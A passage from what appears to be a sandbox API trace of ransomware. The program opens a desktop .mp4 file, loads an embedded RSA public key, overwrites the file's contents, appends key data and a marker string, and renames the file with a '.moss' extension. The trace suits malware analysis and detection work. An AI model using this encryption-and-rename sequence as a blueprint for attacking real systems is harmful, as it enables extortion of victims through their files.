(lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.161] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3330 | out: hHeap=0xcd0000) returned 1 [0170.161] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dba4350, ftCreationTime.dwHighDateTime=0x1d5db3b, ftLastAccessTime.dwLowDateTime=0x2b4315e0, ftLastAccessTime.dwHighDateTime=0x1d5df67, ftLastWriteTime.dwLowDateTime=0x2b4315e0, ftLastWriteTime.dwHighDateTime=0x1d5df67, nFileSizeHigh=0x0, nFileSizeLow=0x12f41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B5FYW04taLjBYUYnSE.mp4", cAlternateFileName="B5FYW0~1.MP4")) returned 1 [0170.162] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\B5FYW04taLjBYUYnSE.mp4") returned=".mp4" [0170.162] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\B5FYW04taLjBYUYnSE.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\b5fyw04taljbyuynse.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.162] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=77633) returned 1 [0170.162] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.165] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x12f1b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.165] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.166] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x12f41, lpOverlapped=0x0) returned 1 [0170.167] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.167] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.167] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.167] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0170.168] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.169] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.169] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.169] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.169] GetLastError () returned 0x0 [0170.169] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.169] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0170.169] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.169] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.169] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.169] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.169] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.170] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.170] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc230 | out: hHeap=0xcd0000) returned 1 [0170.170] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc248 | out: hHeap=0xcd0000) returned 1 [0170.170] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.170] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0170.170] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0170.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0170.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc248 [0170.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0170.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc230 [0170.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0170.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3b44690 [0170.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0170.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0170.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0170.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0170.170] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.170] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.170] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc248 | out: hHeap=0xcd0000) returned 1 [0170.170] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.170] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc230 | out: hHeap=0xcd0000) returned 1 [0170.170] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0170.170] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0170.170] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.170] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0170.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0170.171] GetCurrentThreadId () returned 0x324 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b49da0 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.171] GetCurrentThreadId () returned 0x324 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35ceae8 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0170.171] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.171] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0170.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc230 [0170.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0170.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc248 [0170.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0170.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc218 [0170.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0170.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0170.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0170.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0170.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0170.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc260 [0170.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0170.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0170.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0170.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0170.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0170.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0170.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0170.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc230 | out: hHeap=0xcd0000) returned 1 [0170.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc230 [0170.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0170.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b44ac8 [0170.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0170.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48820 [0170.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x35f7c30 [0170.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0170.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0170.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc230 | out: hHeap=0xcd0000) returned 1 [0170.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48a38 [0170.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0170.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xdc53e8 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ebf0 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a38 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc260 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc248 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc218 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc200 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4bfb0 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44ac8 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0170.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0170.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0170.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0170.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.175] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0x12f3c, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0x12f3c, lpOverlapped=0x0) returned 1 [0170.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0170.175] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x12f41, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.175] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0170.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0170.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0170.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0170.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0170.176] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0170.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0170.176] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.176] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.176] CloseHandle (hObject=0x664) returned 1 [0170.178] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b45fd8 [0170.178] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8b0) returned 0x3b4b098 [0170.178] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45fd8 | out: hHeap=0xcd0000) returned 1 [0170.178] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\B5FYW04taLjBYUYnSE.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\b5fyw04taljbyuynse.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\B5FYW04taLjBYUYnSE.mp4.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\b5fyw04taljbyuynse.mp4.moss")) returned 1 [0170.179] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.179] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.179] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.180] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3330 | out: hHeap=0xcd0000) returned 1 [0170.180] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, 